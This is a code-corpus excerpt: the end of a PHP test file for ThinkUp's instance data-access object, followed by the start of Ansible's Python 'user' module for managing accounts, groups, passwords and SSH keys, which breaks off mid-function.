    $this->assertEqual($result->network_user_id, 18);
}
public function testGetInstanceFreshestPublicOne() {
    // Initialize the fixture list; the original appended to an undefined
    // variable, which raises an E_NOTICE under strict error reporting.
    $builders = array();
    $builders[] = FixtureBuilder::build('instances', array('network_user_id'=>'501',
        'network_username'=>'mememe', 'is_public'=>'1', 'is_activated'=>'1', 'crawler_last_run'=>'-1h'));
    // With one public instance (crawled an hour ago) it must be freshest.
    $result = $this->DAO->getInstanceFreshestPublicOne();
    $this->assertIsA($result, "Instance");
    $this->assertEqual($result->network_username, 'mememe');
    $this->assertEqual($result->network_user_id, 501);
    // A more recently crawled public instance should now win.
    $builders[] = FixtureBuilder::build('instances', array('network_user_id'=>'502',
        'network_username'=>'mememetoo', 'is_public'=>'1', 'is_activated'=>'1', 'crawler_last_run'=>'-30m'));
    $result = $this->DAO->getInstanceFreshestPublicOne();
    $this->assertIsA($result, "Instance");
    $this->assertEqual($result->network_username, 'mememetoo');
    $this->assertEqual($result->network_user_id, 502);
}
public function testGetPublicInstances() {
    // Exactly one public instance is seeded: Jillian Dickerson's.
    $public = $this->DAO->getPublicInstances();
    $this->assertIsA($public, "Array");
    $this->assertEqual(sizeof($public), 1);
    $this->assertIsA($public[0], "Instance");
    $this->assertEqual($public[0]->network_username, "Jillian Dickerson");
}
public function testUpdateInstanceUsername() {
    $this->DAO = new InstanceMySQLDAO();
    // Initialize the fixture list; the original appended to an undefined
    // variable, which raises an E_NOTICE under strict error reporting.
    $builders = array();
    $builders[] = FixtureBuilder::build('instances', array('network_user_id'=>17,
        'network_username'=>'johndoe', 'network'=>'twitter', 'network_viewer_id'=>15,
        'crawler_last_run'=>'2010-01-01 12:00:01', 'is_active'=>1));
    $instance = $this->DAO->getByUsername('johndoe');
    // Rename and confirm exactly one row was updated.
    $update_cnt = $this->DAO->updateUsername($instance->id, 'johndoe2');
    $this->assertEqual(1, $update_cnt);
    // The old name should no longer resolve; the new one should.
    $instance = $this->DAO->getByUsername('johndoe');
    $this->assertNull($instance);
    $instance = $this->DAO->getByUsername('johndoe2');
    $this->assertEqual($instance->network_username, "johndoe2");
}
public function testGetActiveInstancesStalestFirstForOwnerByNetworkNoAuthError() {
    // Seed an extra active, private twitter instance (id 6, 'yaya') that
    // belongs to owner 3 and has no auth error recorded.
    $this->builders[] = FixtureBuilder::build('instances', array('network_user_id'=>17, 'network_username'=>'yaya',
        'network'=>'twitter', 'network_viewer_id'=>17, 'crawler_last_run'=>'2010-01-21 12:00:00', 'is_active'=>1,
        'is_public'=>0));
    $this->builders[] = FixtureBuilder::build('owner_instances', array('owner_id'=>3, 'instance_id'=>6,
        'auth_error'=>''));
    $this->DAO = new InstanceMySQLDAO();

    $owner = new Owner();
    $owner->id = 2;

    // A non-admin owner only sees their own instance (jill).
    $owner->is_admin = false;
    $instances = $this->DAO->getActiveInstancesStalestFirstForOwnerByNetworkNoAuthError($owner, 'twitter');
    $this->assertEqual(sizeof($instances), 1);
    $this->assertEqual($instances[0]->id, 2);
    $this->assertEqual($instances[0]->network_username, "jill");

    // An admin sees both active twitter instances, stalest first.
    $owner->is_admin = true;
    $instances = $this->DAO->getActiveInstancesStalestFirstForOwnerByNetworkNoAuthError($owner, 'twitter');
    $this->assertEqual(sizeof($instances), 2);
    $this->assertEqual($instances[0]->id, 2);
    $this->assertEqual($instances[0]->network_username, "jill");
    $this->assertEqual($instances[1]->id, 6);
    $this->assertEqual($instances[1]->network_username, "yaya");
}
public function testSetPostArchiveLoaded() {
    // Initialize the fixture list; the original appended to an undefined
    // variable, which raises an E_NOTICE under strict error reporting.
    $builders = array();
    $builders[] = FixtureBuilder::build('instances', array('network_user_id'=>17,
        'network_username'=>'johndoe', 'network'=>'twitter', 'network_viewer_id'=>15,
        'crawler_last_run'=>'2010-01-01 12:00:01', 'is_active'=>1, 'is_archive_loaded_posts'=>0));
    // Mark the archive loaded, then confirm the flag via a fresh load.
    $this->DAO->setPostArchiveLoaded(17, 'twitter');
    $result = $this->DAO->getByUsername('johndoe');
    $this->assertTrue($result->is_archive_loaded_posts);
}
}
| ddanuj/ThinkUp | tests/TestOfInstanceMySQLDAO.php | PHP | gpl-3.0 | 35,194 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2012, Stephen Fromm <sfromm@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
module: user
version_added: "0.2"
short_description: Manage user accounts
description:
- Manage user accounts and user attributes.
- For Windows targets, use the M(win_user) module instead.
options:
name:
description:
- Name of the user to create, remove or modify.
type: str
required: true
aliases: [ user ]
uid:
description:
- Optionally sets the I(UID) of the user.
type: int
comment:
description:
- Optionally sets the description (aka I(GECOS)) of user account.
type: str
hidden:
description:
- macOS only, optionally hide the user from the login window and system preferences.
- The default will be C(yes) if the I(system) option is used.
type: bool
version_added: "2.6"
non_unique:
description:
- Optionally when used with the -u option, this option allows to change the user ID to a non-unique value.
type: bool
default: no
version_added: "1.1"
seuser:
description:
- Optionally sets the seuser type (user_u) on selinux enabled systems.
type: str
version_added: "2.1"
group:
description:
- Optionally sets the user's primary group (takes a group name).
type: str
groups:
description:
- List of groups user will be added to. When set to an empty string C(''),
C(null), or C(~), the user is removed from all groups except the
primary group. (C(~) means C(null) in YAML)
- Before Ansible 2.3, the only input format allowed was a comma separated string.
type: list
append:
description:
- If C(yes), add the user to the groups specified in C(groups).
- If C(no), user will only be added to the groups specified in C(groups),
removing them from all other groups.
type: bool
default: no
shell:
description:
- Optionally set the user's shell.
- On macOS, before Ansible 2.5, the default shell for non-system users was C(/usr/bin/false).
Since Ansible 2.5, the default shell for non-system users on macOS is C(/bin/bash).
- On other operating systems, the default shell is determined by the underlying tool being
used. See Notes for details.
type: str
home:
description:
- Optionally set the user's home directory.
type: path
skeleton:
description:
- Optionally set a home skeleton directory.
- Requires C(create_home) option!
type: str
version_added: "2.0"
password:
description:
- Optionally set the user's password to this crypted value.
- On macOS systems, this value has to be cleartext. Beware of security issues.
- To create a disabled account on Linux systems, set this to C('!') or C('*').
- See U(https://docs.ansible.com/ansible/faq.html#how-do-i-generate-crypted-passwords-for-the-user-module)
for details on various ways to generate these password values.
type: str
state:
description:
- Whether the account should exist or not, taking action if the state is different from what is stated.
type: str
choices: [ absent, present ]
default: present
create_home:
description:
- Unless set to C(no), a home directory will be made for the user
when the account is created or if the home directory does not exist.
- Changed from C(createhome) to C(create_home) in Ansible 2.5.
type: bool
default: yes
aliases: [ createhome ]
move_home:
description:
- "If set to C(yes) when used with C(home: ), attempt to move the user's old home
directory to the specified directory if it isn't there already and the old home exists."
type: bool
default: no
system:
description:
- When creating an account C(state=present), setting this to C(yes) makes the user a system account.
- This setting cannot be changed on existing users.
type: bool
default: no
force:
description:
- This only affects C(state=absent), it forces removal of the user and associated directories on supported platforms.
- The behavior is the same as C(userdel --force), check the man page for C(userdel) on your system for details and support.
- When used with C(generate_ssh_key=yes) this forces an existing key to be overwritten.
type: bool
default: no
remove:
description:
- This only affects C(state=absent), it attempts to remove directories associated with the user.
- The behavior is the same as C(userdel --remove), check the man page for details and support.
type: bool
default: no
login_class:
description:
- Optionally sets the user's login class, a feature of most BSD OSs.
type: str
generate_ssh_key:
description:
- Whether to generate a SSH key for the user in question.
- This will B(not) overwrite an existing SSH key unless used with C(force=yes).
type: bool
default: no
version_added: "0.9"
ssh_key_bits:
description:
- Optionally specify number of bits in SSH key to create.
type: int
default: default set by ssh-keygen
version_added: "0.9"
ssh_key_type:
description:
- Optionally specify the type of SSH key to generate.
- Available SSH key types will depend on implementation
present on target host.
type: str
default: rsa
version_added: "0.9"
ssh_key_file:
description:
- Optionally specify the SSH key filename.
- If this is a relative filename then it will be relative to the user's home directory.
- This parameter defaults to I(.ssh/id_rsa).
type: path
version_added: "0.9"
ssh_key_comment:
description:
- Optionally define the comment for the SSH key.
type: str
default: ansible-generated on $HOSTNAME
version_added: "0.9"
ssh_key_passphrase:
description:
- Set a passphrase for the SSH key.
- If no passphrase is provided, the SSH key will default to having no passphrase.
type: str
version_added: "0.9"
update_password:
description:
- C(always) will update passwords if they differ.
- C(on_create) will only set the password for newly created users.
type: str
choices: [ always, on_create ]
default: always
version_added: "1.3"
expires:
description:
- An expiry time for the user in epoch, it will be ignored on platforms that do not support this.
- Currently supported on GNU/Linux, FreeBSD, and DragonFlyBSD.
- Since Ansible 2.6 you can remove the expiry time by specifying a negative value.
Currently supported on GNU/Linux and FreeBSD.
type: float
version_added: "1.9"
password_lock:
description:
- Lock the password (usermod -L, pw lock, usermod -C).
- BUT implementation differs on different platforms, this option does not always mean the user cannot login via other methods.
- This option does not disable the user, only lock the password. Do not change the password in the same task.
- Currently supported on Linux, FreeBSD, DragonFlyBSD, NetBSD, OpenBSD.
type: bool
version_added: "2.6"
local:
description:
- Forces the use of "local" command alternatives on platforms that implement it.
- This is useful in environments that use centralized authentication when you want to manipulate the local users
(i.e. it uses C(luseradd) instead of C(useradd)).
- This requires that these commands exist on the targeted host, otherwise it will be a fatal error.
type: bool
default: no
version_added: "2.4"
profile:
description:
- Sets the profile of the user.
- Does nothing when used with other platforms.
- Can set multiple profiles using comma separation.
- To delete all the profiles, use C(profile='').
- Currently supported on Illumos/Solaris.
type: str
version_added: "2.8"
authorization:
description:
- Sets the authorization of the user.
- Does nothing when used with other platforms.
- Can set multiple authorizations using comma separation.
- To delete all authorizations, use C(authorization='').
- Currently supported on Illumos/Solaris.
type: str
version_added: "2.8"
role:
description:
- Sets the role of the user.
- Does nothing when used with other platforms.
- Can set multiple roles using comma separation.
- To delete all roles, use C(role='').
- Currently supported on Illumos/Solaris.
type: str
version_added: "2.8"
notes:
- There are specific requirements per platform on user management utilities. However
they generally come pre-installed with the system and Ansible will require they
are present at runtime. If they are not, a descriptive error message will be shown.
- On SunOS platforms, the shadow file is backed up automatically since this module edits it directly.
On other platforms, the shadow file is backed up by the underlying tools used by this module.
- On macOS, this module uses C(dscl) to create, modify, and delete accounts. C(dseditgroup) is used to
modify group membership. Accounts are hidden from the login window by modifying
C(/Library/Preferences/com.apple.loginwindow.plist).
- On FreeBSD, this module uses C(pw useradd) and C(chpass) to create, C(pw usermod) and C(chpass) to modify,
C(pw userdel) to remove, C(pw lock) to lock, and C(pw unlock) to unlock accounts.
- On all other platforms, this module uses C(useradd) to create, C(usermod) to modify, and
C(userdel) to remove accounts.
seealso:
- module: authorized_key
- module: group
- module: win_user
author:
- Stephen Fromm (@sfromm)
'''
EXAMPLES = r'''
- name: Add the user 'johnd' with a specific uid and a primary group of 'admin'
user:
name: johnd
comment: John Doe
uid: 1040
group: admin
- name: Add the user 'james' with a bash shell, appending the group 'admins' and 'developers' to the user's groups
user:
name: james
shell: /bin/bash
groups: admins,developers
append: yes
- name: Remove the user 'johnd'
user:
name: johnd
state: absent
remove: yes
- name: Create a 2048-bit SSH key for user jsmith in ~jsmith/.ssh/id_rsa
user:
name: jsmith
generate_ssh_key: yes
ssh_key_bits: 2048
ssh_key_file: .ssh/id_rsa
- name: Added a consultant whose account you want to expire
user:
name: james18
shell: /bin/zsh
groups: developers
expires: 1422403387
- name: Starting at Ansible 2.6, modify user, remove expiry time
user:
name: james18
expires: -1
'''
RETURN = r'''
append:
description: Whether or not to append the user to groups
returned: When state is 'present' and the user exists
type: bool
sample: True
comment:
description: Comment section from passwd file, usually the user name
returned: When user exists
type: str
sample: Agent Smith
create_home:
description: Whether or not to create the home directory
returned: When user does not exist and not check mode
type: bool
sample: True
force:
description: Whether or not a user account was forcibly deleted
returned: When state is 'absent' and user exists
type: bool
sample: False
group:
description: Primary user group ID
returned: When user exists
type: int
sample: 1001
groups:
description: List of groups of which the user is a member
returned: When C(groups) is not empty and C(state) is 'present'
type: str
sample: 'chrony,apache'
home:
description: "Path to user's home directory"
returned: When C(state) is 'present'
type: str
sample: '/home/asmith'
move_home:
description: Whether or not to move an existing home directory
returned: When C(state) is 'present' and user exists
type: bool
sample: False
name:
description: User account name
returned: always
type: str
sample: asmith
password:
description: Masked value of the password
returned: When C(state) is 'present' and C(password) is not empty
type: str
sample: 'NOT_LOGGING_PASSWORD'
remove:
description: Whether or not to remove the user account
returned: When C(state) is 'absent' and user exists
type: bool
sample: True
shell:
description: User login shell
returned: When C(state) is 'present'
type: str
sample: '/bin/bash'
ssh_fingerprint:
description: Fingerprint of generated SSH key
returned: When C(generate_ssh_key) is C(True)
type: str
sample: '2048 SHA256:aYNHYcyVm87Igh0IMEDMbvW0QDlRQfE0aJugp684ko8 ansible-generated on host (RSA)'
ssh_key_file:
description: Path to generated SSH public key file
returned: When C(generate_ssh_key) is C(True)
type: str
sample: /home/asmith/.ssh/id_rsa
ssh_public_key:
description: Generated SSH public key file
returned: When C(generate_ssh_key) is C(True)
type: str
sample: >
'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC95opt4SPEC06tOYsJQJIuN23BbLMGmYo8ysVZQc4h2DZE9ugbjWWGS1/pweUGjVstgzMkBEeBCByaEf/RJKNecKRPeGd2Bw9DCj/bn5Z6rGfNENKBmo
618mUJBvdlEgea96QGjOwSB7/gmonduC7gsWDMNcOdSE3wJMTim4lddiBx4RgC9yXsJ6Tkz9BHD73MXPpT5ETnse+A3fw3IGVSjaueVnlUyUmOBf7fzmZbhlFVXf2Zi2rFTXqvbdGHKkzpw1U8eB8xFPP7y
d5u1u0e6Acju/8aZ/l17IDFiLke5IzlqIMRTEbDwLNeO84YQKWTm9fODHzhYe0yvxqLiK07 ansible-generated on host'
stderr:
description: Standard error from running commands
returned: When stderr is returned by a command that is run
type: str
sample: Group wheels does not exist
stdout:
description: Standard output from running commands
returned: When standard output is returned by the command that is run
type: str
sample:
system:
description: Whether or not the account is a system account
returned: When C(system) is passed to the module and the account does not exist
type: bool
sample: True
uid:
description: User ID of the user account
returned: When C(UID) is passed to the module
type: int
sample: 1044
'''
import errno
import grp
import calendar
import os
import re
import pty
import pwd
import select
import shutil
import socket
import subprocess
import time
from ansible.module_utils import distro
from ansible.module_utils._text import to_native, to_bytes, to_text
from ansible.module_utils.basic import load_platform_subclass, AnsibleModule
# spwd (shadow password database access) is only present in Pythons built
# on platforms that expose it; record availability so callers can fall
# back to reading the shadow file directly.
try:
    import spwd
    HAVE_SPWD = True
except ImportError:
    HAVE_SPWD = False
# Matches any character that may NOT appear in the hash portion of a
# crypt(3)-style password field; used to sanity-check that the supplied
# 'password' value looks encrypted rather than cleartext.
_HASH_RE = re.compile(r'[^a-zA-Z0-9./=]')
class User(object):
"""
This is a generic User manipulation class that is subclassed
based on platform.
A subclass may wish to override the following action methods:-
- create_user()
- remove_user()
- modify_user()
- ssh_key_gen()
- ssh_key_fingerprint()
- user_exists()
All subclasses MUST define platform and distribution (which may be None).
"""
# Platform/distribution keys consumed by load_platform_subclass() to pick
# the correct User subclass at instantiation time.
platform = 'Generic'
distribution = None
# Path to the shadow password file on this platform family.
SHADOWFILE = '/etc/shadow'
# Index of the account-expiration column within a shadow file entry.
SHADOWFILE_EXPIRE_INDEX = 7
LOGIN_DEFS = '/etc/login.defs'
# Date format passed to useradd/usermod for expiry dates.
DATE_FORMAT = '%Y-%m-%d'
def __new__(cls, *args, **kwargs):
    # Dispatch to the platform-specific subclass (matched on the
    # 'platform'/'distribution' class attributes above).
    return load_platform_subclass(User, args, kwargs)
def __init__(self, module):
self.module = module
self.state = module.params['state']
self.name = module.params['name']
self.uid = module.params['uid']
self.hidden = module.params['hidden']
self.non_unique = module.params['non_unique']
self.seuser = module.params['seuser']
self.group = module.params['group']
self.comment = module.params['comment']
self.shell = module.params['shell']
self.password = module.params['password']
self.force = module.params['force']
self.remove = module.params['remove']
self.create_home = module.params['create_home']
self.move_home = module.params['move_home']
self.skeleton = module.params['skeleton']
self.system = module.params['system']
self.login_class = module.params['login_class']
self.append = module.params['append']
self.sshkeygen = module.params['generate_ssh_key']
self.ssh_bits = module.params['ssh_key_bits']
self.ssh_type = module.params['ssh_key_type']
self.ssh_comment = module.params['ssh_key_comment']
self.ssh_passphrase = module.params['ssh_key_passphrase']
self.update_password = module.params['update_password']
self.home = module.params['home']
self.expires = None
self.password_lock = module.params['password_lock']
self.groups = None
self.local = module.params['local']
self.profile = module.params['profile']
self.authorization = module.params['authorization']
self.role = module.params['role']
if module.params['groups'] is not None:
self.groups = ','.join(module.params['groups'])
if module.params['expires'] is not None:
try:
self.expires = time.gmtime(module.params['expires'])
except Exception as e:
module.fail_json(msg="Invalid value for 'expires' %s: %s" % (self.expires, to_native(e)))
if module.params['ssh_key_file'] is not None:
self.ssh_file = module.params['ssh_key_file']
else:
self.ssh_file = os.path.join('.ssh', 'id_%s' % self.ssh_type)
def check_password_encrypted(self):
    """Warn when the supplied password does not look like a crypt(3) hash.

    This is a heuristic only -- it cannot prove the value is hashed, but it
    catches the common mistake of passing a cleartext password. It emits a
    module warning rather than failing.
    """
    # Darwin needs cleartext password, so skip validation
    if self.module.params['password'] and self.platform != 'Darwin':
        maybe_invalid = False
        # Allow setting the password to * or ! in order to disable the account
        if self.module.params['password'] in set(['*', '!']):
            maybe_invalid = False
        else:
            # : for delimiter, * for disable user, ! for lock user
            # these characters are invalid in the password
            if any(char in self.module.params['password'] for char in ':*!'):
                maybe_invalid = True
            # A crypt(3) hash is of the form $id$salt$digest; no '$' means
            # it cannot be a modular-crypt hash at all.
            if '$' not in self.module.params['password']:
                maybe_invalid = True
            else:
                fields = self.module.params['password'].split("$")
                if len(fields) >= 3:
                    # contains character outside the crypto constraint
                    if bool(_HASH_RE.search(fields[-1])):
                        maybe_invalid = True
                    # md5: $1$ digests are exactly 22 base64 characters
                    if fields[1] == '1' and len(fields[-1]) != 22:
                        maybe_invalid = True
                    # sha256: $5$ digests are exactly 43 characters
                    if fields[1] == '5' and len(fields[-1]) != 43:
                        maybe_invalid = True
                    # sha512: $6$ digests are exactly 86 characters
                    if fields[1] == '6' and len(fields[-1]) != 86:
                        maybe_invalid = True
                else:
                    # Fewer than three '$'-separated fields: not id$salt$digest.
                    maybe_invalid = True
        if maybe_invalid:
            self.module.warn("The input password appears not to have been hashed. "
                             "The 'password' argument must be encrypted for this module to work properly.")
def execute_command(self, cmd, use_unsafe_shell=False, data=None, obey_checkmode=True):
if self.module.check_mode and obey_checkmode:
self.module.debug('In check mode, would have run: "%s"' % cmd)
return (0, '', '')
else:
# cast all args to strings ansible-modules-core/issues/4397
cmd = [str(x) for x in cmd]
return self.module.run_command(cmd, use_unsafe_shell=use_unsafe_shell, data=data)
def backup_shadow(self):
if not self.module.check_mode and self.SHADOWFILE:
return self.module.backup_local(self.SHADOWFILE)
def remove_user_userdel(self):
if self.local:
command_name = 'luserdel'
else:
command_name = 'userdel'
cmd = [self.module.get_bin_path(command_name, True)]
if self.force:
cmd.append('-f')
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user_useradd(self):
    """Build and run a useradd/luseradd command line to create the account.

    Options are appended only for parameters the caller supplied.  Returns
    the (rc, out, err) tuple from execute_command().
    """
    if self.local:
        command_name = 'luseradd'
    else:
        command_name = 'useradd'
    cmd = [self.module.get_bin_path(command_name, True)]
    if self.uid is not None:
        cmd.append('-u')
        cmd.append(self.uid)
        # -o (non-unique uid) is only meaningful together with -u
        if self.non_unique:
            cmd.append('-o')
    if self.seuser is not None:
        cmd.append('-Z')
        cmd.append(self.seuser)
    if self.group is not None:
        if not self.group_exists(self.group):
            self.module.fail_json(msg="Group %s does not exist" % self.group)
        cmd.append('-g')
        cmd.append(self.group)
    elif self.group_exists(self.name):
        # use the -N option (no user group) if a group already
        # exists with the same name as the user to prevent
        # errors from useradd trying to create a group when
        # USERGROUPS_ENAB is set in /etc/login.defs.
        if os.path.exists('/etc/redhat-release'):
            dist = distro.linux_distribution(full_distribution_name=False)
            major_release = int(dist[1].split('.')[0])
            if major_release <= 5:
                # RHEL <= 5 useradd spells the option -n instead of -N
                cmd.append('-n')
            else:
                cmd.append('-N')
        elif os.path.exists('/etc/SuSE-release'):
            # -N did not exist in useradd before SLE 11 and did not
            # automatically create a group
            dist = distro.linux_distribution(full_distribution_name=False)
            major_release = int(dist[1].split('.')[0])
            if major_release >= 12:
                cmd.append('-N')
        else:
            cmd.append('-N')
    if self.groups is not None and len(self.groups):
        groups = self.get_groups_set()
        cmd.append('-G')
        cmd.append(','.join(groups))
    if self.comment is not None:
        cmd.append('-c')
        cmd.append(self.comment)
    if self.home is not None:
        cmd.append('-d')
        cmd.append(self.home)
    if self.shell is not None:
        cmd.append('-s')
        cmd.append(self.shell)
    if self.expires is not None:
        cmd.append('-e')
        # a pre-Epoch expiry means "already expired": pass an empty date
        if self.expires < time.gmtime(0):
            cmd.append('')
        else:
            cmd.append(time.strftime(self.DATE_FORMAT, self.expires))
    if self.password is not None:
        cmd.append('-p')
        cmd.append(self.password)
    if self.create_home:
        # luseradd always creates the home dir, so -m is Linux-useradd only
        if not self.local:
            cmd.append('-m')
        if self.skeleton is not None:
            cmd.append('-k')
            cmd.append(self.skeleton)
    else:
        cmd.append('-M')
    if self.system:
        cmd.append('-r')
    cmd.append(self.name)
    return self.execute_command(cmd)
def _check_usermod_append(self):
# check if this version of usermod can append groups
if self.local:
command_name = 'lusermod'
else:
command_name = 'usermod'
usermod_path = self.module.get_bin_path(command_name, True)
# for some reason, usermod --help cannot be used by non root
# on RH/Fedora, due to lack of execute bit for others
if not os.access(usermod_path, os.X_OK):
return False
cmd = [usermod_path, '--help']
(rc, data1, data2) = self.execute_command(cmd, obey_checkmode=False)
helpout = data1 + data2
# check if --append exists
lines = to_native(helpout).split('\n')
for line in lines:
if line.strip().startswith('-a, --append'):
return True
return False
def modify_user_usermod(self):
    """Build and run a usermod/lusermod command reflecting requested changes.

    Only options whose requested value differs from the current account
    state are appended; when nothing needs changing, (None, '', '') is
    returned without running anything.
    """
    if self.local:
        command_name = 'lusermod'
    else:
        command_name = 'usermod'
    cmd = [self.module.get_bin_path(command_name, True)]
    info = self.user_info()
    has_append = self._check_usermod_append()
    if self.uid is not None and info[2] != int(self.uid):
        cmd.append('-u')
        cmd.append(self.uid)
        # -o (non-unique uid) is only meaningful together with -u
        if self.non_unique:
            cmd.append('-o')
    if self.group is not None:
        if not self.group_exists(self.group):
            self.module.fail_json(msg="Group %s does not exist" % self.group)
        ginfo = self.group_info(self.group)
        if info[3] != ginfo[2]:
            cmd.append('-g')
            cmd.append(self.group)
    if self.groups is not None:
        # get a list of all groups for the user, including the primary
        current_groups = self.user_group_membership(exclude_primary=False)
        groups_need_mod = False
        groups = []
        if self.groups == '':
            # empty 'groups' means: strip all supplementary groups
            if current_groups and not self.append:
                groups_need_mod = True
        else:
            groups = self.get_groups_set(remove_existing=False)
            group_diff = set(current_groups).symmetric_difference(groups)
            if group_diff:
                if self.append:
                    for g in groups:
                        if g in group_diff:
                            if has_append:
                                cmd.append('-a')
                            groups_need_mod = True
                            break
                else:
                    groups_need_mod = True
        if groups_need_mod:
            if self.append and not has_append:
                # lusermod has no -a; -A adds the listed groups instead
                cmd.append('-A')
                cmd.append(','.join(group_diff))
            else:
                cmd.append('-G')
                cmd.append(','.join(groups))
    if self.comment is not None and info[4] != self.comment:
        cmd.append('-c')
        cmd.append(self.comment)
    if self.home is not None and info[5] != self.home:
        cmd.append('-d')
        cmd.append(self.home)
        if self.move_home:
            cmd.append('-m')
    if self.shell is not None and info[6] != self.shell:
        cmd.append('-s')
        cmd.append(self.shell)
    if self.expires is not None:
        current_expires = int(self.user_password()[1])
        if self.expires < time.gmtime(0):
            # pre-Epoch target means "remove the expiry"
            if current_expires >= 0:
                cmd.append('-e')
                cmd.append('')
        else:
            # Convert days since Epoch to seconds since Epoch as struct_time
            current_expire_date = time.gmtime(current_expires * 86400)
            # Current expires is negative or we compare year, month, and day only
            if current_expires < 0 or current_expire_date[:3] != self.expires[:3]:
                cmd.append('-e')
                cmd.append(time.strftime(self.DATE_FORMAT, self.expires))
    # Lock if no password or unlocked, unlock only if locked
    if self.password_lock and not info[1].startswith('!'):
        cmd.append('-L')
    elif self.password_lock is False and info[1].startswith('!'):
        # usermod will refuse to unlock a user with no password, module shows 'changed' regardless
        cmd.append('-U')
    if self.update_password == 'always' and self.password is not None and info[1] != self.password:
        cmd.append('-p')
        cmd.append(self.password)
    # skip if no changes to be made
    if len(cmd) == 1:
        return (None, '', '')
    cmd.append(self.name)
    return self.execute_command(cmd)
def group_exists(self, group):
    """Return True when ``group`` resolves either as a gid or a group name."""
    try:
        # numeric lookup first: ``group`` may be a gid
        grp.getgrgid(int(group))
        return True
    except (ValueError, KeyError):
        pass
    try:
        grp.getgrnam(group)
        return True
    except KeyError:
        return False
def group_info(self, group):
    """Return the grp entry for ``group`` as a list, or False when it is absent."""
    if not self.group_exists(group):
        return False
    try:
        # numeric lookup first: ``group`` may be a gid
        entry = grp.getgrgid(int(group))
    except (ValueError, KeyError):
        entry = grp.getgrnam(group)
    return list(entry)
def get_groups_set(self, remove_existing=True):
    """Return the requested groups as a set of names, or None when unset.

    Fails the module for a non-existent group.  With ``remove_existing``
    the user's current primary group is dropped from the result.
    """
    if self.groups is None:
        return None
    info = self.user_info()
    requested = set(part.strip() for part in self.groups.split(',') if part)
    for name in list(requested):
        if not self.group_exists(name):
            self.module.fail_json(msg="Group %s does not exist" % (name))
        if info and remove_existing and self.group_info(name)[2] == info[3]:
            requested.discard(name)
    return requested
def user_group_membership(self, exclude_primary=True):
    ''' Return a list of groups the user belongs to '''
    result = []
    info = self.get_pwd_info()
    for entry in grp.getgrall():
        if self.name not in entry.gr_mem:
            continue
        # the primary group is skipped unless explicitly requested
        if not exclude_primary or info[3] != entry.gr_gid:
            result.append(entry[0])
    return result
def user_exists(self):
    """Return True when ``self.name`` is present in the passwd database."""
    try:
        found = bool(pwd.getpwnam(self.name))
    except KeyError:
        return False
    if found:
        return True
def get_pwd_info(self):
    """Return the passwd entry for ``self.name`` as a list, or False if absent."""
    if self.user_exists():
        return list(pwd.getpwnam(self.name))
    return False
def user_info(self):
    """Return the passwd entry for the user as a list, or False if absent.

    When the passwd password field is just a placeholder ('x' or empty),
    it is replaced with the real hash from the shadow database.
    """
    if not self.user_exists():
        return False
    info = self.get_pwd_info()
    if len(info[1]) in (0, 1):
        info[1] = self.user_password()[0]
    return info
def user_password(self):
    """Return (password_hash, expires) for the user.

    Prefers the spwd module when available; otherwise falls back to
    scanning SHADOWFILE directly.  Either element may be '' when the
    value cannot be determined.
    """
    passwd = ''
    expires = ''
    if HAVE_SPWD:
        try:
            passwd = spwd.getspnam(self.name)[1]
            expires = spwd.getspnam(self.name)[7]
            return passwd, expires
        except KeyError:
            return passwd, expires
        except OSError as e:
            # Python 3.6 raises PermissionError instead of KeyError
            # Due to absence of PermissionError in python2.7 need to check
            # errno
            if e.errno in (errno.EACCES, errno.EPERM):
                return passwd, expires
            raise
    if not self.user_exists():
        return passwd, expires
    elif self.SHADOWFILE:
        # Read shadow file for user's encrypted password string
        if os.path.exists(self.SHADOWFILE) and os.access(self.SHADOWFILE, os.R_OK):
            with open(self.SHADOWFILE, 'r') as f:
                for line in f:
                    if line.startswith('%s:' % self.name):
                        passwd = line.split(':')[1]
                        # empty expiry field maps to -1 ("never")
                        expires = line.split(':')[self.SHADOWFILE_EXPIRE_INDEX] or -1
    return passwd, expires
def get_ssh_key_path(self):
    """Return the path of the user's SSH private key file.

    A relative ``ssh_file`` is resolved against the user's home directory;
    raises when the home directory is missing (except in check mode).
    """
    info = self.user_info()
    if os.path.isabs(self.ssh_file):
        return self.ssh_file
    if not os.path.exists(info[5]) and not self.module.check_mode:
        raise Exception('User %s home directory does not exist' % self.name)
    return os.path.join(info[5], self.ssh_file)
def ssh_key_gen(self):
    """Generate an SSH key pair for the user with ssh-keygen.

    Creates the containing directory (mode 0700, owned by the user) when
    needed.  With a passphrase, ssh-keygen is driven through ptys so the
    passphrase prompts can be answered; otherwise ``-N ''`` is passed.
    Returns (rc, out, err); rc None means "nothing done / key exists".
    """
    info = self.user_info()
    overwrite = None
    try:
        ssh_key_file = self.get_ssh_key_path()
    except Exception as e:
        return (1, '', to_native(e))
    ssh_dir = os.path.dirname(ssh_key_file)
    if not os.path.exists(ssh_dir):
        if self.module.check_mode:
            return (0, '', '')
        try:
            os.mkdir(ssh_dir, int('0700', 8))
            os.chown(ssh_dir, info[2], info[3])
        except OSError as e:
            return (1, '', 'Failed to create %s: %s' % (ssh_dir, to_native(e)))
    if os.path.exists(ssh_key_file):
        if self.force:
            # ssh-keygen doesn't support overwriting the key interactively, so send 'y' to confirm
            overwrite = 'y'
        else:
            return (None, 'Key already exists, use "force: yes" to overwrite', '')
    cmd = [self.module.get_bin_path('ssh-keygen', True)]
    cmd.append('-t')
    cmd.append(self.ssh_type)
    if self.ssh_bits > 0:
        cmd.append('-b')
        cmd.append(self.ssh_bits)
    cmd.append('-C')
    cmd.append(self.ssh_comment)
    cmd.append('-f')
    cmd.append(ssh_key_file)
    if self.ssh_passphrase is not None:
        if self.module.check_mode:
            self.module.debug('In check mode, would have run: "%s"' % cmd)
            return (0, '', '')
        # drive ssh-keygen through ptys so it believes it has a terminal
        # and prints its passphrase prompts
        master_in_fd, slave_in_fd = pty.openpty()
        master_out_fd, slave_out_fd = pty.openpty()
        master_err_fd, slave_err_fd = pty.openpty()
        env = os.environ.copy()
        env['LC_ALL'] = 'C'
        try:
            p = subprocess.Popen([to_bytes(c) for c in cmd],
                                 stdin=slave_in_fd,
                                 stdout=slave_out_fd,
                                 stderr=slave_err_fd,
